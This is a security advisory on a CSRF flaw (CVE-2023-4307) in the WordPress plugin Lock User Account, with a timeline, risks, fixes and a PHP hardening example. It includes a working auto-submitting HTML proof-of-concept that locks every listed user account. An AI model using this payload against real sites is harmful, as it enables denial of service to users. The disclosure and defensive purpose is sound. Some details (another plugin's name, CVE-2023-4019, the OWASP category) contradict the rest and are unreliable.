CVE-2023-4307 – Lock User Account <= 1.0.3 - Arbitrary Lock/Unlock of All Accounts via CSRF


During a security assessment of WordPress plugins, a serious vulnerability was found in the Lock User Account plugin. A Cross-Site Request Forgery (CSRF) flaw lets an attacker make a logged-in administrator lock every user account on the site, with nothing in the admin interface to show it happened.

Main info:

CVE: CVE-2023-4307
Plugin: Lock User Account
Criticality: High
Publicly Published: August 21, 2023
Last Updated: August 21, 2023
Researcher: Dmitrii Ignatyev
OWASP TOP-10: A2: Broken Authentication and Session Management
PoC: Yes
Exploit: No
References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4307
https://wpscan.com/vulnerability/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3

Timeline

August 4, 2023: Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
August 4, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 12, 2023: The author has removed his plugin from the WordPress library
August 22, 2023: Registered CVE-2023-4307

Discovery of the Vulnerability

While testing the plugin, which lets an administrator lock the account of any user, a CSRF vulnerability was found: an administrator who opens a malicious link locks all accounts, without any indication that it happened. The plugin's lock action performs no _wpnonce check.

Understanding the CSRF attack

An attacker can craft a malicious link or page that, when opened by a logged-in administrator, submits a lock request to the Lock User Account plugin using the administrator's own session. Because the plugin never verifies a _wpnonce, it cannot tell this forged request from one submitted through the users page, and all listed accounts are locked without the administrator's knowledge. CSRF – OWASP TOP-10

Exploiting the CSRF vulnerability

An administrator who unknowingly opens the malicious link locks every WordPress user account listed in the request. The result is severe: users can no longer log in, and the site is effectively unavailable to them.

PoC HTML code:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://your_site/wordpress/wp-admin/users.php">
      <input type="hidden" name="s" value="" />
      <input type="hidden" name="action" value="lock" />
      <input type="hidden" name="new_role" value="" />
      <input type="hidden" name="paged" value="1" />
      <input type="hidden" name="users[0]" value="1" />
      <input type="hidden" name="users[1]" value="2" />
      <input type="hidden" name="users[2]" value="3" />
      <input type="hidden" name="users[3]" value="4" />
      <input type="hidden" name="action2" value="lock" />
      <input type="hidden" name="new_role2" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

P.S. Further hidden inputs named users[N] can be added, with values up to YOUR_MAX_USERS_NUMBER.

Potential Risks and Real-World Impact

The CSRF vulnerability within the Lock User Account plugin introduces grave risks and potential scenarios:

  1. Unauthorized Account Blocking:
    An attacker could craft a malicious link and trick the administrator into clicking on it unknowingly. This would lead to the administrator unintentionally blocking all user accounts on the website.
  2. Mass Account Disruption:
    As all user accounts get blocked, it could lead to a mass disruption of user access to the website. This might cause significant inconvenience to users and damage the reputation of the website.
  3. Denial of Service (DoS):
    By blocking all accounts, the website may effectively experience a DoS situation, preventing legitimate users from accessing their accounts and using the website’s services.

Recommendations for Improved Security

To protect a WordPress environment against CVE-2023-4019:

  • Delete the plugin:
    Since the plugin has been removed from the WordPress library, it must be uninstalled. The current version remains vulnerable to this attack.
  • Implement _wpnonce verification:
    Add _wpnonce verification to the plugin's lock/unlock action. A nonce that a cross-site form cannot obtain is the standard WordPress defense against CSRF and blocks the forged request.
  • Regular Security Audits:
    Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  • Educate Administrators:
    Educate administrators about the nature of CSRF attacks and the importance of cautious clicking. Raising awareness among your team can prevent inadvertent actions that could compromise site security.
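To show what the missing check described in the Discovery section looks like, and what the "Implement _wpnonce verification" recommendation means in practice, here is an added illustrative example (not the Lock User Account plugin's own code). It assumes a handler hooked on load-users.php that reads the action and user IDs from the request and stores the lock state in a user meta key; the function names and the meta key example_locked are placeholders.

```php
<?php
// Added example, not the plugin's code. Assumes the plugin handles
// action=lock on wp-admin/users.php and stores the state in user meta.

// VULNERABLE pattern: trusts action/users straight from the request with no
// nonce or capability check, so the PoC form above is enough to trigger it.
function example_lock_handler_vulnerable() {
    if ( empty( $_REQUEST['action'] ) || 'lock' !== $_REQUEST['action'] ) {
        return;
    }
    foreach ( (array) $_REQUEST['users'] as $user_id ) {
        update_user_meta( (int) $user_id, 'example_locked', 1 );
    }
}

// HARDENED pattern: the same handler with the checks the advisory recommends.
function example_lock_handler_hardened() {
    if ( empty( $_REQUEST['action'] ) || 'lock' !== $_REQUEST['action'] ) {
        return;
    }
    // 1. Only a user who may edit users can lock accounts.
    if ( ! current_user_can( 'edit_users' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // 2. The bulk-action form on users.php carries the core 'bulk-users'
    //    nonce (wp_nonce_field( 'bulk-users' ) in WP_List_Table). A page on
    //    another origin cannot read it, so check_admin_referer() rejects the
    //    forged request (it dies with "The link you followed has expired").
    check_admin_referer( 'bulk-users' );
    // 3. Sanitize the IDs and never lock the acting administrator's own account.
    $current = get_current_user_id();
    foreach ( array_map( 'intval', (array) $_REQUEST['users'] ) as $user_id ) {
        if ( $user_id <= 0 || $user_id === $current ) {
            continue;
        }
        update_user_meta( $user_id, 'example_locked', 1 );
    }
}
add_action( 'load-users.php', 'example_lock_handler_hardened' );
```

The core users.php form itself submits via GET, so requiring POST is not an option here; the nonce plus the capability check is what makes the action unforgeable.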

Sharing this information within the WordPress community helps administrators recognize and remove the vulnerable plugin, and keeps their sites protected against CVE-2023-4307.


Dmitrii i.
